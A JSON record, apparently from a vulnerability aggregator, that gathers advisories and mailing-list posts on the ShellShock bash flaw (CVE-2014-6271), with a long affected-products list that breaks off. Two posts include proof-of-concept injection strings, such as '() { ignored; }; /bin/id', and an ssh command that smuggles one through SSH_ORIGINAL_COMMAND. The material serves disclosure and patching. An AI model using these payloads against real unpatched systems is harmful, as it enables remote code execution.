{"cve": [{"lastseen": "2018-12-01T12:01:16", "bulletinFamily": "NVD", "description": "GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka \"ShellShock.\" NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.", "modified": "2018-11-30T16:29:07", "published": "2014-09-24T14:48:04", "id": "CVE-2014-6271", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271", "title": "CVE-2014-6271", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2018-09-07T03:26:11", "bulletinFamily": "software", "description": "CVE-2014-6271 and CVE-2014-7169 \u2013 ShellShock\n\n# \n\nImportant\n\n# Vendor\n\nCanonical Ubuntu, CentOS\n\n# Versions Affected\n\n * Canonical Ubuntu 10.04 LTS that include bash \n * CentOS 6.5 that include bash \n\n# Description\n\nGNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients and other situations in which setting the environment occurs across a privilege boundary from Bash execution.\n\nThe Cloud Foundry project is in the process of checking if Cloud Foundry are vulnerable to remote code execution or other exploits. No exploits have been identified or confirmed yet. The Cloud Foundry project is patching all components that have packaged the vulnerable version of bash.\n\n# Affected Products and Versions\n\n_Severity is important unless otherwise noted. \n_\n\n * All versions of Cloud Foundry BOSH stemcells prior to 2719.1 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry runtime prior to v186 have bash executables vulnerable to CVE-2014-6271 \n * All versions of Cloud Foundry BOSH stemcells prior to 2719.2 have bash executables vulnerable to CVE-2014-7169 \n * All versions of Cloud Foundry runtime v186 and prior have bash executables vulnerable to CVE-2014-7169 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v183 or earlier upgrade to v186 or later and BOSH stemcells 2719.1 or later, which contains the patched version of bash that resolves CVE-2014-6271. \n * The Cloud Foundry Project recommends that BOSH deployments running BOSH stemcells 2719.1 and prior upgrade to BOSH stemcell 2719.2 and higher which contains the patched version of bash that resolves CVE-2014-6271 and CVE-2014-7169. \n * The Cloud Foundry project recommends that Cloud Foundry Runtime Deployments running Release v186 and prior upgrade to Release v187 or later. \n\n# Credit\n\nStephane Chazelas (CVE-2014-6271) and Huzaifa S. Sidhpurwala (CVE-2014-7169)\n\n# References\n\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271>\n * <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <https://github.com/cloudfoundry/cf-release>\n\n# History\n\n2014-Sep-25: Initial vulnerability report published.\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "CFOUNDRY:13948A26B0F4A736B03310A8560A6F73", "href": "https://www.cloudfoundry.org/blog/cve-2014-6271-and-cve-2014-7169/", "title": "CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n* Florian Weimer:\r\n\r\n> Chet Ramey, the GNU bash upstream maintainer, will soon release\r\n> official upstream patches.\r\n\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025\r\n\r\nSomeone has posted large parts of the prenotification as a news\r\narticle, so in the interest of full disclosure, here is what we wrote\r\nto the non-vendors (vendors also received patches):\r\n\r\nDebian and other GNU/Linux vendors plan to disclose a critical,\r\nremotely exploitable security vulnerability in bash this week, related\r\nto the processing of environment variables. Stephane Chazelas\r\ndiscovered it, and CVE-2014-6271 has been assigned to it.\r\n\r\nThe issue is currently under embargo (not public), and you receive\r\nthis message as a courtesy notification because we assume that you\r\nhave network-based filtering capabilities, so that you can work on\r\nways to protect a significant number of customers. However, you\r\nshould not yet distribute IPS/IDS signatures, publicly or to\r\ncustomers.\r\n\r\nAt present, public disclosure is scheduled for Wednesday, 2014-09-24\r\n14:00 UTC. We do not expect the schedule to change, but we may be\r\nforced to revise it.\r\n\r\n\r\nThe technical details of the vulnerability follow.\r\n\r\nBash supports exporting not just shell variables, but also shell\r\nfunctions to other bash instances, via the process environment to\r\n(indirect) child processes. Current bash versions use an environment\r\nvariable named by the function name, and a function definition\r\nstarting with \u201c() {\u201d in the variable value to propagate function\r\ndefinitions through the environment. The vulnerability occurs because\r\nbash does not stop after processing the function definition; it\r\ncontinues to parse and execute shell commands following the function\r\ndefinition. For example, an environment variable setting of\r\n\r\n VAR=() { ignored; }; /bin/id\r\n\r\nwill execute /bin/id when the environment is imported into the bash\r\nprocess. (The process is in a slightly undefined state at this point.\r\nThe PATH variable may not have been set up yet, and bash could crash\r\nafter executing /bin/id, but the damage has already happened at this\r\npoint.)\r\n\r\nThe fact that an environment variable with an arbitrary name can be\r\nused as a carrier for a malicious function definition containing\r\ntrailing commands makes this vulnerability particularly severe; it\r\nenables network-based exploitation.\r\n\r\n\r\n\r\nSo far, HTTP requests to CGI scripts have been identified as the major\r\nattack vector.\r\n\r\nA typical HTTP request looks like this:\r\n\r\nGET /path?query-param-name=query-param-value HTTP/1.1\r\nHost: www.example.com\r\nCustom: custom-header-value\r\n\r\nThe CGI specification maps all parts to environment variables. With\r\nApache httpd, the magic string \u201c() {\u201d can appear in these places:\r\n\r\n* Host (\u201cwww.example.com\u201d, as REMOTE_HOST)\r\n* Header value (\u201ccustom-header-value\u201d, as HTTP_CUSTOM in this example)\r\n* Server protocol (\u201cHTTP/1.1\u201d, as SERVER_PROTOCOL)\r\n\r\nThe user name embedded in an Authorization header could be a vector as\r\nwell, but the corresponding REMOTE_USER variable is only set if the\r\nuser name corresponds to a known account according to the\r\nauthentication configuration, and a configuration which accepts the\r\nmagic string appears somewhat unlikely.\r\n\r\nIn addition, with other CGI implementations, the request method\r\n(\u201cGET\u201d), path (\u201c/path\u201d) and query string\r\n(\u201cquery-param-name=query-param-value\u201d) may be vectors, and it is\r\nconceivable for \u201cquery-param-value\u201d as well, and perhaps even\r\n\u201cquery-param-name\u201d.\r\n\r\nThe other vector is OpenSSH, either through AcceptEnv variables, TERM\r\nor SSH_ORIGINAL_COMMAND.\r\n\r\nOther vectors involving different environment variable set by\r\nadditional programs are expected.\r\n\r\n\r\n\r\nAgain, please do not disclose this issue to customers or the general\r\npublic until the embargo has expired.\r\n\r\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31102", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31102", "title": "Re: [oss-security] CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\nOn Wed, Sep 24, 2014 at 04:05:51PM +0200, Florian Weimer wrote:\r\n> Stephane Chazelas discovered a vulnerability in bash, related to how\r\n> environment variables are processed: trailing code in function\r\n> definitions was executed, independent of the variable name.\r\n>\r\n> In many common configurations, this vulnerability is exploitable over\r\n> the network.\r\n>\r\n> Chet Ramey, the GNU bash upstream maintainer, will soon release\r\n> official upstream patches.\r\n\r\nMore detail is already out:\r\n\r\nhttps://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\r\nhttp://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html\r\n\r\nFlorian posted a Debian security advisory on this ([DSA 3032-1] bash\r\nsecurity update) to the debian-security-announce list, but somehow it is\r\nnot yet seen at:\r\n\r\nhttps://www.debian.org/security/\r\nhttps://lists.debian.org/debian-security-announce/2014/\r\n\r\n(I guess it will be very soon.)\r\n\r\nI've just confirmed that the issue can be exploited via OpenSSH setting\r\nSSH_ORIGINAL_COMMAND:\r\n\r\n$ ssh -o 'rsaauthentication yes' 0 '() { ignored; }; /usr/bin/id' \r\nuid=500(sandbox) gid=500(sandbox) groups=500(sandbox)\r\nReceived disconnect from 127.0.0.1: Command terminated on signal 11.\r\n\r\nThis is with command="set" in .ssh/authorized_keys for the key being\r\nused. (Without the "; /usr/bin/id" portion, the command prints the\r\nenvironment variables, including SSH_ORIGINAL_COMMAND being the function\r\nwith just "ignored" in its body.) As we can see, the command runs, and\r\nmoreover in this case bash happened to segfault after having run "id".\r\n\r\nI see no good workaround. Starting the forced command with "unset\r\nSSH_ORIGINAL_COMMAND &&" does not help - we'd need to unset the variable\r\nbefore starting bash, not from bash.\r\n\r\nTERM is another attack vector, but IIRC sshd does not set TERM when\r\nno-pty is used. So, speaking of SSH forced commands, it appears to be\r\nonly SSH_ORIGINAL_COMMAND that we have no good workaround for.\r\n\r\nIndeed, there are many other setups where the problem is exploitable,\r\nnot just SSH forced commands.\r\n\r\nAlexander\r\n\r\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31103", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31103", "title": "Re: [oss-security] CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2362-1\r\nSeptember 24, 2014\r\n\r\nbash vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nBash allowed bypassing environment restrictions in certain environments.\r\n\r\nSoftware Description:\r\n- bash: GNU Bourne Again SHell\r\n\r\nDetails:\r\n\r\nStephane Chazelas discovered that Bash incorrectly handled trailing code in\r\nfunction definitions. An attacker could use this issue to bypass\r\nenvironment restrictions, such as SSH forced command environments.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 14.04 LTS:\r\n bash 4.3-7ubuntu1.1\r\n\r\nUbuntu 12.04 LTS:\r\n bash 4.2-2ubuntu2.2\r\n\r\nUbuntu 10.04 LTS:\r\n bash 4.1-2ubuntu3.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2362-1\r\n CVE-2014-6271\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.1\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31100", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31100", "title": "[USN-2362-1] Bash vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2018-03-12T10:28:36", "bulletinFamily": "software", "description": "### Description\n\nGNU Bash is prone to remote code execution vulnerability. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.\n\n### Technologies Affected\n\n * Advantech EKI-1320 1.98 \n * Advantech EKI-1320 \n * Alcatel-Lucent QIP \n * Apple Mac OS X 10.0.0 3 \n * Apple Mac OS X 10.0.0 \n * Apple Mac OS X 10.0.1 \n * Apple Mac OS X 10.0.2 \n * Apple Mac OS X 10.0.3 \n * Apple Mac OS X 10.0.4 \n * Apple Mac OS X 10.1.0 \n * Apple Mac OS X 10.1.1 \n * Apple Mac OS X 10.1.2 \n * Apple Mac OS X 10.1.3 \n * Apple Mac OS X 10.1.4 \n * Apple Mac OS X 10.1.5 \n * Apple Mac OS X 10.2.0 \n * Apple Mac OS X 10.2.1 \n * Apple Mac OS X 10.2.2 \n * Apple Mac OS X 10.2.3 \n * Apple Mac OS X 10.2.4 \n * Apple Mac OS X 10.2.5 \n * Apple Mac OS X 10.2.6 \n * Apple Mac OS X 10.2.7 \n * Apple Mac OS X 10.2.8 \n * Apple Mac OS X 10.3.0 \n * Apple Mac OS X 10.3.1 \n * Apple Mac OS X 10.3.2 \n * Apple Mac OS X 10.3.3 \n * Apple Mac OS X 10.3.4 \n * Apple Mac OS X 10.3.5 \n * Apple Mac OS X 10.3.6 \n * Apple Mac OS X 10.3.7 \n * Apple Mac OS X 10.3.8 \n * Apple Mac OS X 10.3.9 \n * Apple Mac OS X 10.4.0 \n * Apple Mac OS X 10.4.1 \n * Apple Mac OS X 10.4.10 \n * Apple Mac OS X 10.4.11 \n * Apple Mac OS X 10.4.2 \n * Apple Mac OS X 10.4.3 \n * Apple Mac OS X 10.4.4 \n * Apple Mac OS X 10.4.5 \n * Apple Mac OS X 10.4.6 \n * Apple Mac OS X 10.4.7 \n * Apple Mac OS X 10.4.8 \n * Apple Mac OS X 10.4.9 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6 Update 12 \n * Apple Mac OS X 10.6 Update 14 \n * Apple Mac OS X 10.6 Update 17 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X 10.6.5 \n * Apple Mac OS X 10.6.6 \n * Apple Mac OS X 10.6.7 \n * Apple Mac OS X 10.6.8 \n * Apple Mac OS X 10.7 \n * Apple Mac OS X 10.7.0 \n * Apple Mac OS X 10.7.1 \n * Apple Mac OS X 10.7.2 \n * Apple Mac OS X 10.7.3 \n * Apple Mac OS X 10.7.4 \n * Apple Mac OS X 10.7.5 \n * Apple Mac OS X 10.8 \n * Apple Mac OS X 10.8.0 \n * Apple Mac OS X 10.8.1 \n * Apple Mac OS X 10.8.2 \n * Apple Mac OS X 10.8.3 \n * Apple Mac OS X 10.8.4 \n * Apple Mac OS X 10.8.5 \n * Apple Mac OS X 10.8.5 Supplemental Update \n * Apple Mac OS X 10.9 \n * Apple Mac OS X 10.9.1 \n * Apple Mac OS X 10.9.2 \n * Apple Mac OS X 10.9.3 \n * Apple Mac OS X 10.9.4 \n * Apple Mac OS X 10.9.5 \n * Apple Mac OS X Server 10.7.5 \n * Appneta Pathview \n * Arista Networks EOS 4.14 \n * Arista Networks EOS 4.9 \n * Avaya 96x1 IP Deskphone 6 \n * Avaya 96x1 IP Deskphone 6.2 \n * Avaya 96x1 IP Deskphone 6.3 \n * Avaya 96x1 IP Deskphones 6.0 \n * Avaya 96x1 IP Deskphones 6.2 \n * Avaya ADS virtual app 2.0 \n * Avaya Aura Application Enablement Services 5.0 \n * Avaya Aura Application Enablement Services 5.2 \n * Avaya Aura Application Enablement Services 5.2.1 \n * Avaya Aura Application Enablement Services 5.2.2 \n * Avaya Aura Application Enablement Services 5.2.3 \n * Avaya Aura Application Enablement Services 5.2.4 \n * Avaya Aura Application Enablement Services 6.0 \n * Avaya Aura Application Enablement Services 6.1 \n * Avaya Aura Application Enablement Services 6.1.1 \n * Avaya Aura Application Enablement Services 6.1.2 \n * Avaya Aura Application Enablement Services 6.2 \n * Avaya Aura Application Enablement Services 6.3 \n * Avaya Aura Application Server 5300 SIP Core 2.0 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB16 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB19 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB23 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB25 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB26 \n * Avaya Aura Application Server 5300 SIP Core 2.0 PB28 \n * Avaya Aura Application Server 5300 SIP Core 2.1 \n * Avaya Aura Application Server 5300 SIP Core 3.0 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB3 \n * Avaya Aura Application Server 5300 SIP Core 3.0 PB5 \n * Avaya Aura Collaboration Environment 2.0 \n * Avaya Aura Collaboration Environment 3.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 4.0 \n * Avaya Aura Communication Manager 5.1 \n * Avaya Aura Communication Manager 5.2 \n * Avaya Aura Communication Manager 5.2.0 \n * Avaya Aura Communication Manager 5.2.1 \n * Avaya Aura Communication Manager 5.2.1 SP2 \n * Avaya Aura Communication Manager 5.2.1 SP4 \n * Avaya Aura Communication Manager 5.2.1 SP5 \n * Avaya Aura Communication Manager 5.2.1 SSP1 \n * Avaya Aura Communication Manager 5.2.1 SSP2 \n * Avaya Aura Communication Manager 5.2.1 SSP3 \n * Avaya Aura Communication Manager 6.0 \n * Avaya Aura Communication Manager 6.0.1 \n * Avaya Aura Communication Manager 6.2 \n * Avaya Aura Communication Manager 6.3 \n * Avaya Aura Communication Manager Utility Services 6.0 \n * Avaya Aura Communication Manager Utility Services 6.1 \n * Avaya Aura Communication Manager Utility Services 6.1 SP 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.1.0.9.8 \n * Avaya Aura Communication Manager Utility Services 6.2 \n * Avaya Aura Communication Manager Utility Services 6.2.4.0.15 \n * Avaya Aura Communication Manager Utility Services 6.2.5.0.15 \n * Avaya Aura Communication Manager Utility Services 6.3 \n * Avaya Aura Conferencing 7.0 \n * Avaya Aura Conferencing 7.0 Standard \n * Avaya Aura Conferencing 7.2 \n * Avaya Aura Conferencing 8.0 \n * Avaya Aura Conferencing Standard Edition 6.0 \n * Avaya Aura Experience Portal 6.0 \n * Avaya Aura Experience Portal 6.0 SP1 \n * Avaya Aura Experience Portal 6.0 SP2 \n * Avaya Aura Experience Portal 6.0.1 \n * Avaya Aura Experience Portal 6.0.2 \n * Avaya Aura Experience Portal 7.0 \n * Avaya Aura Messaging 6.0 \n * Avaya Aura Messaging 6.0.1 \n * Avaya Aura Messaging 6.1 \n * Avaya Aura Messaging 6.1.1 \n * Avaya Aura Messaging 6.2 \n * Avaya Aura Presence Services 6.0 \n * Avaya Aura Presence Services 6.1 \n * Avaya Aura Presence Services 6.1 SP1 \n * Avaya Aura Presence Services 6.1.1 \n * Avaya Aura Presence Services 6.1.2 \n * Avaya Aura Session Manager 5.2 \n * Avaya Aura Session Manager 5.2 SP1 \n * Avaya Aura Session Manager 5.2 SP2 \n * Avaya Aura Session Manager 5.2.1 \n * Avaya Aura Session Manager 6.0 \n * Avaya Aura Session Manager 6.0 SP1 \n * Avaya Aura Session Manager 6.0.1 \n * Avaya Aura Session Manager 6.1 \n * Avaya Aura Session Manager 6.1 SP1 \n * Avaya Aura Session Manager 6.1 SP2 \n * Avaya Aura Session Manager 6.1.1 \n * Avaya Aura Session Manager 6.1.2 \n * Avaya Aura Session Manager 6.1.3 \n * Avaya Aura Session Manager 6.1.5 \n * Avaya Aura Session Manager 6.2 \n * Avaya Aura Session Manager 6.2 SP1 \n * Avaya Aura Session Manager 6.2.1 \n * Avaya Aura Session Manager 6.2.2 \n * Avaya Aura Session Manager 6.3 \n * Avaya Aura System Manager 5.2 \n * Avaya Aura System Manager 6.0 \n * Avaya Aura System Manager 6.0 SP1 \n * Avaya Aura System Manager 6.1 \n * Avaya Aura System Manager 6.1 SP1 \n * Avaya Aura System Manager 6.1 SP2 \n * Avaya Aura System Manager 6.1.1 \n * Avaya Aura System Manager 6.1.2 \n * Avaya Aura System Manager 6.1.3 \n * Avaya Aura System Manager 6.1.5 \n * Avaya Aura System Manager 6.2 \n * Avaya Aura System Manager 6.2 SP3 \n * Avaya Aura System Manager 6.3 \n * Avaya Aura System Platform 1.0 \n * Avaya Aura System Platform 1.1 \n * Avaya Aura System Platform 6.0 \n * Avaya Aura System Platform 6.0 SP2 \n * Avaya Aura System Platform 6.0 SP3 \n * Avaya Aura System Platform 6.0.1 \n * Avaya Aura System Platform 6.0.2 \n * Avaya Aura System Platform 6.0.3.0.3 \n * Avaya Aura System Platform 6.0.3.8.3 \n * Avaya Aura System Platform 6.0.3.9.3 \n * Avaya Aura System Platform 6.2 \n * Avaya Aura System Platform 6.2 SP1 \n * Avaya Aura System Platform 6.2.1 \n * Avaya Aura System Platform 6.2.1.0.9 \n * Avaya Aura System Platform 6.3 \n * Avaya B189 IP Conference Phone 1.0 \n * Avaya B189 IP Conference Phone 1.0.0.22 \n * Avaya B189 IP Conference Phone 1.0.0.23 \n * Avaya CMS r17 \n * Avaya Collaboration Pod on VMware vCenter Server Appliance 2.0 \n * Avaya Communication Server 1000E 6.0 \n * Avaya Communication Server 1000E 7.0 \n * Avaya Communication Server 1000E 7.5 \n * Avaya Communication Server 1000E 7.6 \n * Avaya Communication Server 1000E Signaling Server 6.0 \n * Avaya Communication Server 1000E Signaling Server 7.0 \n * Avaya Communication Server 1000E Signaling Server 7.5 \n * Avaya Communication Server 1000E Signaling Server 7.6 \n * Avaya Communication Server 1000M 6.0 \n * Avaya Communication Server 1000M 7.0 \n * Avaya Communication Server 1000M 7.5 \n * Avaya Communication Server 1000M 7.6 \n * Avaya Communication Server 1000M Signaling Server 6.0 \n * Avaya Communication Server 1000M Signaling Server 7.0 \n * Avaya Communication Server 1000M Signaling Server 7.5 \n * Avaya Communication Server 1000M Signaling Server 7.6 \n * Avaya Configuration and Orchestration Manager \n * Avaya Configuration and Orchestration Manager COM 3.1 \n * Avaya Configuration and Orchestration Manager VPS 1.1 \n * Avaya Diagnostic Server 1.0 \n * Avaya Element Management System 6.0 \n * Avaya IP Flow Manager \n * Avaya IP Office Application Server 8.0 \n * Avaya IP Office Application Server 8.1 \n * Avaya IP Office Application Server 9.0 \n * Avaya IP Office Application Server 9.0 SP 1 \n * Avaya IP Office Application Server 9.0 SP 2 \n * Avaya IP Office Server Edition 8.0 \n * Avaya IP Office Server Edition 8.1 \n * Avaya IP Office Server Edition 9.0 \n * Avaya IQ 4.0 \n * Avaya IQ 4.1.0 \n * Avaya IQ 4.2 \n * Avaya IQ 5 \n * Avaya IQ 5.1 \n * Avaya IQ 5.1.1 \n * Avaya IQ 5.2 \n * Avaya Identity Engines Ignition Server 9.0.2 SP \n * Avaya Meeting Exchange 5.0 \n * Avaya Meeting Exchange 6.0 \n * Avaya Meeting Exchange 6.2 \n * Avaya Message Networking 5.2 \n * Avaya Message Networking 5.2 SP1 \n * Avaya Message Networking 5.2 SP3 \n * Avaya Message Networking 5.2 SP4 \n * Avaya Message Networking 5.2.1 \n * Avaya Message Networking 5.2.2 \n * Avaya Message Networking 5.2.3 \n * Avaya Message Networking 5.2.4 \n * Avaya Message Networking 5.2.5 \n * Avaya Message Networking 6.2.0 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Avaya Messaging Message Storage Server 5 \n * Avaya Messaging Message Storage Server 5.2.1 \n * Avaya Pod Orchestration Suite 1.0 \n * Avaya Pod Orchestration Suite 1.0.1 \n * Avaya Pod Orchestration Suite 2.0 \n * Avaya Proactive Contact 5.0 \n * Avaya Proactive Contact 5.1 \n * Avaya SAL GW virtual app 1.0 \n * Avaya Secure Access Core Concentrator 5.0 \n * Avaya Secure Access Core Concentrator 6.0 \n * Avaya Secure Access Link 1.5 \n * Avaya Secure Access Link 1.8 \n * Avaya Secure Access Link 2.0 \n * Avaya Secure Access Link GAS 5.0 \n * Avaya Secure Access Link GAS 6.0 \n * Avaya Secure Access Link Policy Server 1.5 \n * Avaya Secure Access Remote Access Concentrator 5.0 \n * Avaya Secure Access Remote Access Concentrator 6.0 \n * Avaya Services VM 1.0 \n * Avaya Services VM 2.0 \n * Avaya VPN Gateway 3050 \n * Avaya VPN Gateway 3070 \n * Avaya VPN Gateway 3090 \n * Avaya Virtualization Provisioning Service 1.1 \n * Avaya Visualization Fault and Performance Manager \n * Avaya Wireless LAN 9100 WOS with AOS 7.0.5 \n * Avaya one-X Client Enablement Services 6.1 \n * Avaya one-X Client Enablement Services 6.1.1 \n * Avaya one-X Client Enablement Services 6.1.2 \n * Avaya one-X Client Enablement Services 6.2 \n * Brocade Fibre Channel switches \n * CentOS CentOS 5 \n * Checkpoint Gaia Embedded NGX R65 \n * Checkpoint Gaia Embedded R70 \n * Checkpoint Gaia Embedded R70.1 \n * Checkpoint Gaia Embedded R70.20 \n * Checkpoint Gaia Embedded R70.30 \n * Checkpoint Gaia Embedded R70.40 \n * Checkpoint Gaia Embedded R70.50 \n * Checkpoint Gaia Embedded R71 \n * Checkpoint Gaia Embedded R71.10 \n * Checkpoint Gaia Embedded R71.20 \n * Checkpoint Gaia Embedded R71.30 \n * Checkpoint Gaia Embedded R71.40 \n * Checkpoint Gaia Embedded R71.45 \n * Checkpoint Gaia Embedded R71.50 \n * Checkpoint Gaia Embedded R75 \n * Checkpoint Gaia Embedded R75.10 \n * Checkpoint Gaia Embedded R75.20 \n * Checkpoint Gaia Embedded R75.30 \n * Checkpoint Gaia Embedded R75.40 \n * Checkpoint Gaia Embedded R75.40VS \n * Checkpoint Gaia Embedded R75.45 \n * Checkpoint Gaia Embedded R75.46 \n * Checkpoint Gaia Embedded R75.47 \n * Checkpoint Gaia Embedded R76 \n * Checkpoint Gaia Embedded R77 \n * Checkpoint Gaia Embedded R77.10 \n * Checkpoint Gaia Embedded R77.20 \n * Checkpoint Gaia NGX R65 \n * Checkpoint Gaia Os R75.0 \n * Checkpoint Gaia Os R76.0 \n * Checkpoint Gaia R70 \n * Checkpoint Gaia R70.1 \n * Checkpoint Gaia R70.20 \n * Checkpoint Gaia R70.30 \n * Checkpoint Gaia R70.40 \n * Checkpoint Gaia R70.50 \n * Checkpoint Gaia R71 \n * Checkpoint Gaia R71.10 \n * Checkpoint Gaia R71.20 \n * Checkpoint Gaia R71.30 \n * Checkpoint Gaia R71.40 \n * Checkpoint Gaia R71.45 \n * Checkpoint Gaia R71.50 \n * Checkpoint Gaia R75 \n * Checkpoint Gaia R75.10 \n * Checkpoint Gaia R75.20 \n * Checkpoint Gaia R75.30 \n * Checkpoint Gaia R75.40VS \n * Checkpoint Gaia R75.45 \n * Checkpoint Gaia R75.46 \n * Checkpoint Gaia R75.47 \n * Checkpoint Gaia R76 \n * Checkpoint Gaia R77 \n * Checkpoint Gaia R77.10 \n * Checkpoint Gaia R77.20 \n * Checkpoint IPSO 6.2 NGX R65 \n * Checkpoint IPSO 6.2 R70 \n * Checkpoint IPSO 6.2 R70.1 \n * Checkpoint IPSO 6.2 R70.20 \n * Checkpoint IPSO 6.2 R70.30 \n * Checkpoint IPSO 6.2 R70.40 \n * Checkpoint IPSO 6.2 R70.50 \n * Checkpoint IPSO 6.2 R71 \n * Checkpoint IPSO 6.2 R71.10 \n * Checkpoint IPSO 6.2 R71.20 \n * Checkpoint IPSO 6.2 R71.30 \n * Checkpoint IPSO 6.2 R71.40 \n * Checkpoint IPSO 6.2 R71.45 \n * Checkpoint IPSO 6.2 R71.50 \n * Checkpoint IPSO 6.2 R75 \n * Checkpoint IPSO 6.2 R75.10 \n * Checkpoint IPSO 6.2 R75.20 \n * Checkpoint IPSO 6.2 R75.30 \n * Checkpoint IPSO 6.2 R75.40 \n * Checkpoint IPSO 6.2 R75.40VS \n * Checkpoint IPSO 6.2 R75.45 \n * Checkpoint IPSO 6.2 R75.46 \n * Checkpoint IPSO 6.2 R75.47 \n * Checkpoint IPSO 6.2 R76 \n * Checkpoint IPSO 6.2 R77 \n * Checkpoint IPSO 6.2 R77.10 \n * Checkpoint IPSO 6.2 R77.20 \n * Checkpoint SecurePlatform 2.6 NGX R65 \n * Checkpoint SecurePlatform 2.6 R70 \n * Checkpoint SecurePlatform 2.6 R70.1 \n * Checkpoint SecurePlatform 2.6 R70.20 \n * Checkpoint SecurePlatform 2.6 R70.30 \n * Checkpoint SecurePlatform 2.6 R70.40 \n * Checkpoint 